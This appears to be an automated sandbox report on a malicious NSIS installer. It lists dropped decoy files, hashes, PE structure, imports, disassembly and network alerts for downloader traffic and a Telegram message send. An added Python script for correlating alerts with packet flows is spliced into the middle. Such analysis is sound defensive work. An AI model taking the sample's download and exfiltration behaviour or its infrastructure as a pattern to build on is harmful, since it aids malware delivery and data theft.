                                                                                                                                                                          SHA1:A7F36FD33206209CB0E5E39643EC8C6773D5ED3B
                                                                                                                                                                          SHA-256:16FDDF0D82AA1263194FE7C92459A6CF21DDDB1F1AE5A4E5A099865DB126614F
                                                                                                                                                                          SHA-512:7F27A00EDA246719E5F8FA521AC9499002DFDB36F6E661E13797C863520D84D14F43B5F717B176BBBEFCB4B62B671A14292C59DF288C55628CA08868BBCCFBD3
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:[bloodstained initialdeterminanten]..unprescinded produktionsforholds identific dysurias biblioteksbgernes textman kaldte spotlightet archearl,sofus unvessel souffleer cementblanders stoneweed rufe trningsdragternes genitivisk bartizaned....[registrar aabredden]..;teardowns batchkrselens unform gradgrind,eksekveringens afskrifters secretors printerporte..
                                                                                                                                                                          Process:C:\Users\user\Desktop\uPDwUy9ewY.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):348384
                                                                                                                                                                          Entropy (8bit):7.639034171049347
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6144:dyfPRKaSNCVG2cTS6Q1tkVPNhc2olqXezTsWDdilXtd:dqsGGMeNCWXePJDdiZ
                                                                                                                                                                          MD5:A1A4353FD27981B35FE7B52E89E44403
                                                                                                                                                                          SHA1:24AA8E6DD6379047634FB430C0B5DD0D82BF7E92
                                                                                                                                                                          SHA-256:A6EED1C6BAE46D80F20E7B3D16C676D3F1A1D59D27460C47FB7A4FF40FD691EF
                                                                                                                                                                          SHA-512:A3F7F0BDA2E1BBA7883C47B1AA5E721602F0E7E26289F5135362DAE1B2F02ED27EFCE26716CC560CA6622560BB2C947DF8C2FAB6C63CC46EB9A57B0CA7360064
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:......DD................rrr...@@...SSSS...............................uu......~~...3................W...........rr..11..........B.........uuuu..........................U....R.........ll.F.........lll..DD.==...................................0.r...%........]........W......................................7.........c.........T....====..................................>>>>>..... ."..L....tttt.......-.((...]...S..~.........o..-......l...................-.....r....%%...........7..&.ZZ...[.........X.........................................2.&........................+....##.......CC...........q..l.66...............//..o.._.....................vvvvvv...RR..................$........1..................r................&.........\..XX..9...ww........8..eeee..3...0......g.h...........M....((.22..|.............XX...0........................e.......O.............ff...................S...........W........II...[.j.ll.G...........i.......+.....=......................44.................88.........QQ....
Process:C:\Users\user\Desktop\uPDwUy9ewY.exe
File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 79x629, components 3
Category:dropped
Size (bytes):7357
Entropy (8bit):7.91945978739656
Encrypted:false
SSDEEP:192:LqBD2cMKYD6M3QJxtEns0OU16nK3HXJ2UgU:eBDnM6MgDtEEUknqYUL
MD5:F32B2F6007A74312B5F0CB1AA5B26680
SHA1:BC3DC7EB50EFA53CE2FC46A32C5F995048BD85B3
SHA-256:2CB79365771956854ACEAD63102B019737F5C99A5A10DA94D2969638CC23E825
SHA-512:EBE3120E79D07F3D1D775940ADF00E099AFD6F3273D49C2D600FEE1ACE2C175C9E01CBE9EB3D83EF7D033F129C5D562983F19B1D7CD327763A92E9A246EB94F3
Malicious:false
Process:C:\Users\user\Desktop\uPDwUy9ewY.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):188
Entropy (8bit):4.482002609682535
Encrypted:false
SSDEEP:3:jNgLDK9OujIcBAVar8kQWgQQXTzMTBWAQ2qQJCTgLck/xLCmSoTKA9jsqdn:WEOnwfoOVm0tnNwTOdg295dn
MD5:2B51E420AA9188A74DB9D853C1225B5C
SHA1:B1AA913BBE9C576F1C7917AE2E18F4F5C4B54164
SHA-256:FA760065782306B4B9E082086166D25EADA402A3332C771C48F4EDE9D5DC7E53
SHA-512:574581B87211289CC809F0BF97E968E5BC070C95B20E92ADC4315404A3E632754291BBE3B3AF1894441855BD25C797FF52ADF968DC0A73F710F199017CAF37E6
Malicious:false
Preview:benittas thirstier inductometer.Halvlngde forlyder roth..Cicuta barbaren udsugningsanlggets,privatisere rationalizing protogyny udmntningsprofil gyrolith volkswagen..[tyndtarmes sstykke]..
Process:C:\Users\user\Desktop\uPDwUy9ewY.exe
File Type:Generic INItialization configuration [FJORTENAARSFDSELSDAGES UDSTDELSERNES]
Category:dropped
Size (bytes):279
Entropy (8bit):4.994626166298632
Encrypted:false
SSDEEP:6:2/r0IwOQPFeBmRaaBO/XJLgDj/GZowKblJBQVAL6Ab9xu+b1:2A9OQYYJO/XuGZjKJJiVu6AbT5R
MD5:6620E9C5C35F1FEAAFC525A49FF31080
SHA1:969AB64F04BCDCAB9088F1F2FA6A8209DB33E8FD
SHA-256:FCD285BFF12244DA3CF356243BEACEB8DB8B2868320D371D1059408AD02A0CAA
SHA-512:A3238FD4843C3407CD07C014444F2557D7064F53A074F58BE97230A7CC7D81E0C7D09DD25B9110C5568466E2F9AA10EB11129ED143E07F63763EB5FE3DA75ED9
Malicious:false
Preview:[PALEOMAGNETISM CLADOCEROUS]..praseodymium undeftly vestenvindes.Nskesedlers forgrundsfarves spandaueren skrmmevaabnets....;toyos oddesund apostrofe fremfrelses.Opsamlingsbeholdere alkoholdebut unadvertised suggestioneres overprovide......[FJORTENAARSFDSELSDAGES UDSTDELSERNES]..
Process:C:\Users\user\Desktop\uPDwUy9ewY.exe
File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 424x693, components 3
Category:dropped
Size (bytes):32639
Entropy (8bit):7.9475019669336495
Encrypted:false
SSDEEP:768:6+UnjpGM4h/Q0kf7jWCXOi/vWYjc/Gv33xxMatfqxi/fftvoEP:6+UjpB4K0kjjWKOi/vWYjOUHXtfqAXvP
MD5:86647E5BC7C82F155C5CB0EC05F40E9F
SHA1:E0946F26733AA05FCEAE067377622C083AF88C8D
SHA-256:6D1974E15C49647F2BA907D7D233CB04D2F9D9C77CFB6B4255B577FE95D54B19
SHA-512:7C812D119382C9135195DDD18106FC6B465982D36C7815680C52DE2C0A40DC8E569FFBF32E87AF8BA10A71670A01CAB30D0D36CE49DB599473EC10CDACEFF992
Malicious:false
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):509800
Entropy (8bit):7.588494641400243
Encrypted:false
SSDEEP:12288:mQeEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2J/JSJFJ8JjJcJHJQJoXJSJAhwjJTJZf:AEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2H
MD5:0425118557AA95EA418A0B15DD072078
SHA1:9C09BDBE6282DB2E5D6D55456DF456100C133E33
SHA-256:567C3776AFCD2C7DFB3B07E4C6DD281C0DCDC770ED2827C9A84CCCAF3FE97D6C
SHA-512:6DBCA6B67D56860B9F1D53D7FB4C3D5C6844336D6D5878D643C4D70448089D6BC219CA546C206230AE9F044EECA6E0506D76513209DA9A00F4F1702289D06C82
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: ReversingLabs, Detection: 66%
• Antivirus: Virustotal, Detection: 72%
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Preview:[ZoneTransfer]....ZoneId=0
Process:C:\Windows\System32\svchost.exe
File Type:JSON data
Category:dropped
Size (bytes):55
Entropy (8bit):4.306461250274409
Encrypted:false
SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:DCA83F08D448911A14C22EBCACC5AD57
SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:false
Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):7.588494641400243
TrID:
• Win32 Executable (generic) a (10002005/4) 92.16%
• NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:uPDwUy9ewY.exe
File size:509'800 bytes
MD5:0425118557aa95ea418a0b15dd072078
SHA1:9c09bdbe6282db2e5d6d55456df456100c133e33
SHA256:567c3776afcd2c7dfb3b07e4c6dd281c0dcdc770ed2827c9a84cccaf3fe97d6c
SHA512:6dbca6b67d56860b9f1d53d7fb4c3d5c6844336d6d5878d643c4d70448089d6bc219ca546c206230ae9f044eeca6e0506d76513209da9a00f4f1702289d06c82
SSDEEP:12288:mQeEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2J/JSJFJ8JjJcJHJQJoXJSJAhwjJTJZf:AEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2H
TLSH:16B4F1B3B6C6F5A6E5150CF4CD298EF9A3A2EC02C9D9020BB5947F5E78B313345150AE
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....f.R.................\...........0.......p....@
Icon Hash:371f9d96cb0d1703
Entrypoint:0x4030b8
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x52BA66A9 [Wed Dec 25 05:01:29 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:e160ef8e55bb9d162da4e266afd9eef3
Signature Valid:false
Signature Issuer:CN=Scoliid, E=Nonprophetic@Ezekiel.Di, O=Scoliid, L=Petersburg, OU="Servitor Schenkels ", S=New York, C=US
Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:-2146762487
Not Before, Not After
• 29/08/2024 11:36:51 29/08/2025 11:36:51
Subject Chain
• CN=Scoliid, E=Nonprophetic@Ezekiel.Di, O=Scoliid, L=Petersburg, OU="Servitor Schenkels ", S=New York, C=US
Version:3
Thumbprint MD5:81B7CD62136CC0356CDF14966785C227
Thumbprint SHA-1:947D32228436A9DAE09A8911CEB912D3FE4483D7
Thumbprint SHA-256:36518F28D3E9AC7ED381310574D9BBEE40417FDB060DD00F1136ACEC57734850
                                                                                                                                                                          Serial:6EC066A3A1BED47218ACBC540F5D6AD12D206890
Instruction
sub esp, 00000184h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409190h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407034h]
push 00008001h
call dword ptr [0040711Ch]
push ebx
call dword ptr [0040728Ch]
push 00000008h
mov dword ptr [00423778h], eax
call 00007F3A70ADF80Ah
mov dword ptr [004236C4h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041EC80h
call dword ptr [00407164h]
push 00409180h
push 00422EC0h
call 00007F3A70ADF4B4h
call dword ptr [00407120h]
mov ebp, 00429000h
push eax
push ebp
call 00007F3A70ADF4A2h
push ebx
call dword ptr [00407118h]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [004236C0h], eax
mov eax, ebp
jne 00007F3A70ADCA7Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007F3A70ADEF32h
push eax
call dword ptr [00407220h]
mov dword ptr [esp+1Ch], eax
jmp 00007F3A70ADCB35h
cmp cl, 00000020h
jne 00007F3A70ADCA78h
inc eax
cmp byte ptr [eax], 00000020h
je 00007F3A70ADCA6Ch
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x36000 | 0x18a50 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x7c060 | 0x708 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5a6a | 0x5c00 | 8781c451557a4626018483faabe438d0 | False | 0.6614724864130435 | data | 6.417713695663469 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x11ce | 0x1200 | 640f709ec19b4ed0455a4c64e5934d5e | False | 0.4520399305555556 | OpenPGP Secret Key | 5.23558258677739 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1a7b8 | 0x400 | c9a433d4fe67308d6a5942cfb667cbe7 | False | 0.5986328125 | data | 4.862130355383113 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x24000 | 0x12000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x36000 | 0x18a50 | 0x18c00 | ae1da6d52c6b9db5a72bcee2295c6945 | False | 0.3393604008838384 | data | 4.6330392279203245 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x36448 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.2523660238968414
RT_ICON | 0x46c70 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.4220954356846473
RT_ICON | 0x49218 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.49343339587242024
RT_ICON | 0x4a2c0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.5876865671641791
RT_ICON | 0x4b168 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | English | United States | 0.5450819672131147
RT_ICON | 0x4baf0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.7319494584837545
RT_ICON | 0x4c398 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | English | United States | 0.7811059907834101
RT_ICON | 0x4ca60 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | English | United States | 0.47804878048780486
RT_ICON | 0x4d0c8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.7095375722543352
RT_ICON | 0x4d630 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.6879432624113475
RT_ICON | 0x4da98 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.5551075268817204
RT_ICON | 0x4dd80 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 0 | English | United States | 0.6086065573770492
RT_ICON | 0x4df68 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.6993243243243243
RT_DIALOG | 0x4e090 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x4e190 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x4e2b0 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x4e378 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x4e3d8 | 0xbc | data | English | United States | 0.601063829787234
RT_VERSION | 0x4e498 | 0x2b0 | data | English | United States | 0.5058139534883721
RT_MANIFEST | 0x4e748 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984
DLL | Import
KERNEL32.dll | GetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, Sleep, CloseHandle, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, SetErrorMode, GetCommandLineA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
USER32.dll | CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll | RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
Description | Data
Comments | forskningslederen phon
CompanyName | influenzaepidemiens doktoren
FileVersion | 2.4.0.0
InternalName | nadvergst.exe
LegalCopyright | bimahs weensier spildevandsledningernes
LegalTrademarks | intensiveringernes
Translation | 0x0409 0x04e4
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-07T16:20:44.422857+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49690 | 142.250.184.238 | 443 | TCP
2025-03-07T16:20:52.107397+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49692 | 132.226.247.73 | 80 | TCP
2025-03-07T16:20:55.498049+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49692 | 132.226.247.73 | 80 | TCP
2025-03-07T16:20:58.171618+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49694 | 104.21.80.1 | 443 | TCP
2025-03-07T16:20:58.982448+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49695 | 132.226.247.73 | 80 | TCP
2025-03-07T16:21:01.488549+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49696 | 104.21.80.1 | 443 | TCP
2025-03-07T16:21:02.294940+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49697 | 132.226.247.73 | 80 | TCP
2025-03-07T16:21:05.810613+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49699 | 132.226.247.73 | 80 | TCP
2025-03-07T16:21:22.728681+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49708 | 104.21.80.1 | 443 | TCP
2025-03-07T16:21:26.055869+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.8 | 49709 | 149.154.167.220 | 443 | TCP
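The alert rows above name a client port and a server endpoint, and the packet timeline that follows lists the individual segments of each connection. An analyst normally joins the two: fold the packets into bidirectional flows and attach each alert to the flow it fired on, so that one can see how long the alerted connection lasted, how much traffic went each way, and which alerts have no matching packets in the capture. The script below is an added worked example and is not code from the Joe Sandbox report. Its input records are constructed from a subset of the values in the alert table above and the packet table below; it assumes TCP, and follows the usual Suricata/Zeek convention that the first packet seen for a 5-tuple defines the initiating (client) side.

```python
"""Correlate Suricata alerts with the per-packet timeline of a sandbox run.

Added worked example; it is not part of the Joe Sandbox report. The records
below are constructed from values in the alert and packet tables of the
report (a subset), so the script runs offline.
"""
from dataclasses import dataclass, field
from datetime import datetime


@dataclass
class Alert:
    ts: str
    sid: int
    signature: str
    severity: int
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


@dataclass
class Flow:
    client_ip: str
    client_port: int
    server_ip: str
    server_port: int
    first_seen: datetime
    last_seen: datetime
    to_server: int = 0          # packets sent by the initiating side
    to_client: int = 0          # packets sent back by the peer
    alerts: list = field(default_factory=list)


# Constructed from the Suricata alert table (three of the ten rows).
ALERTS = [
    Alert("2025-03-07T16:20:44.422857+0100", 2803270,
          "ETPRO MALWARE Common Downloader Header Pattern UHCa", 2,
          "192.168.2.8", 49690, "142.250.184.238", 443),
    Alert("2025-03-07T16:20:52.107397+0100", 2803274,
          "ETPRO MALWARE Common Downloader Header Pattern UH", 2,
          "192.168.2.8", 49692, "132.226.247.73", 80),
    Alert("2025-03-07T16:21:26.055869+0100", 1810007,
          "Joe Security ANOMALY Telegram Send Message", 1,
          "192.168.2.8", 49709, "149.154.167.220", 443),
]

# Constructed packet records (timestamp, src port, dst port, src IP, dst IP):
# a few packets of the 49690 and 49691 connections from the packet table.
PACKETS = [
    ("2025-03-07 16:20:41.291045904", 49690, 443, "192.168.2.8", "142.250.184.238"),
    ("2025-03-07 16:20:41.291083097", 443, 49690, "142.250.184.238", "192.168.2.8"),
    ("2025-03-07 16:20:41.291145086", 49690, 443, "192.168.2.8", "142.250.184.238"),
    ("2025-03-07 16:20:44.424472094", 443, 49690, "142.250.184.238", "192.168.2.8"),
    ("2025-03-07 16:20:44.450212002", 49691, 443, "192.168.2.8", "172.217.16.193"),
    ("2025-03-07 16:20:44.450259924", 443, 49691, "172.217.16.193", "192.168.2.8"),
]


def parse_ts(ts: str) -> datetime:
    """Parse a capture timestamp. datetime keeps only microseconds, so the
    nanosecond digits are truncated; ordering within a flow is unaffected."""
    return datetime.strptime(ts[:26], "%Y-%m-%d %H:%M:%S.%f")


def flow_key(ip_a: str, port_a: int, ip_b: str, port_b: int) -> frozenset:
    """Direction-agnostic key so both halves of a conversation map to one flow."""
    return frozenset({(ip_a, port_a), (ip_b, port_b)})


def build_flows(packets) -> dict:
    """Group packets into bidirectional flows. The first packet seen for a
    5-tuple defines the client (initiator) side, as Suricata and Zeek do."""
    flows: dict = {}
    for ts, sport, dport, sip, dip in sorted(packets, key=lambda p: p[0]):
        t = parse_ts(ts)
        key = flow_key(sip, sport, dip, dport)
        flow = flows.get(key)
        if flow is None:
            flow = Flow(sip, sport, dip, dport, t, t)
            flows[key] = flow
        flow.last_seen = max(flow.last_seen, t)
        if (sip, sport) == (flow.client_ip, flow.client_port):
            flow.to_server += 1
        else:
            flow.to_client += 1
    return flows


def attach_alerts(flows: dict, alerts) -> list:
    """Attach each alert to the flow it fired on; return the alerts whose
    connection is absent from the packet set (a capture gap worth noticing)."""
    unmatched = []
    for a in alerts:
        flow = flows.get(flow_key(a.src_ip, a.src_port, a.dst_ip, a.dst_port))
        if flow is None:
            unmatched.append(a)
        else:
            flow.alerts.append(a)
    return unmatched


def summarize(flows: dict) -> list:
    """One line per flow: endpoints, duration, packets per direction, alert SIDs."""
    lines = []
    for f in sorted(flows.values(), key=lambda fl: fl.first_seen):
        dur = (f.last_seen - f.first_seen).total_seconds()
        sids = ",".join(str(a.sid) for a in f.alerts) or "-"
        lines.append(f"{f.client_ip}:{f.client_port} -> {f.server_ip}:{f.server_port}"
                     f"  {dur:.3f}s  {f.to_server}/{f.to_client} pkts  sids={sids}")
    return lines


if __name__ == "__main__":
    flows = build_flows(PACKETS)
    missing = attach_alerts(flows, ALERTS)
    print("\n".join(summarize(flows)))
    print("alerts without packets in this capture:", [a.sid for a in missing])
```

Keying flows by an unordered pair of endpoints rather than by the ordered 5-tuple is what makes the join work: the alert is logged client-to-server, while half of the packet rows are server-to-client. Alerts that come back from attach_alerts unmatched are the ones to check against the full packet list before treating the capture as complete.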
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 7, 2025 16:20:41.291045904 CET | 49690 | 443 | 192.168.2.8 | 142.250.184.238
Mar 7, 2025 16:20:41.291083097 CET | 443 | 49690 | 142.250.184.238 | 192.168.2.8
Mar 7, 2025 16:20:41.291145086 CET | 49690 | 443 | 192.168.2.8 | 142.250.184.238
Mar 7, 2025 16:20:41.306181908 CET | 49690 | 443 | 192.168.2.8 | 142.250.184.238
Mar 7, 2025 16:20:41.306195021 CET | 443 | 49690 | 142.250.184.238 | 192.168.2.8
Mar 7, 2025 16:20:43.630403042 CET | 443 | 49690 | 142.250.184.238 | 192.168.2.8
Mar 7, 2025 16:20:43.630506039 CET | 49690 | 443 | 192.168.2.8 | 142.250.184.238
Mar 7, 2025 16:20:43.631141901 CET | 443 | 49690 | 142.250.184.238 | 192.168.2.8
Mar 7, 2025 16:20:43.631222010 CET | 49690 | 443 | 192.168.2.8 | 142.250.184.238
Mar 7, 2025 16:20:43.702817917 CET | 49690 | 443 | 192.168.2.8 | 142.250.184.238
Mar 7, 2025 16:20:43.702847958 CET | 443 | 49690 | 142.250.184.238 | 192.168.2.8
Mar 7, 2025 16:20:43.703118086 CET | 443 | 49690 | 142.250.184.238 | 192.168.2.8
Mar 7, 2025 16:20:43.703174114 CET | 49690 | 443 | 192.168.2.8 | 142.250.184.238
Mar 7, 2025 16:20:43.706796885 CET | 49690 | 443 | 192.168.2.8 | 142.250.184.238
Mar 7, 2025 16:20:43.752321959 CET | 443 | 49690 | 142.250.184.238 | 192.168.2.8
Mar 7, 2025 16:20:44.422921896 CET | 443 | 49690 | 142.250.184.238 | 192.168.2.8
Mar 7, 2025 16:20:44.423017979 CET | 443 | 49690 | 142.250.184.238 | 192.168.2.8
Mar 7, 2025 16:20:44.423089981 CET | 49690 | 443 | 192.168.2.8 | 142.250.184.238
Mar 7, 2025 16:20:44.423105955 CET | 49690 | 443 | 192.168.2.8 | 142.250.184.238
Mar 7, 2025 16:20:44.424453020 CET | 49690 | 443 | 192.168.2.8 | 142.250.184.238
Mar 7, 2025 16:20:44.424472094 CET | 443 | 49690 | 142.250.184.238 | 192.168.2.8
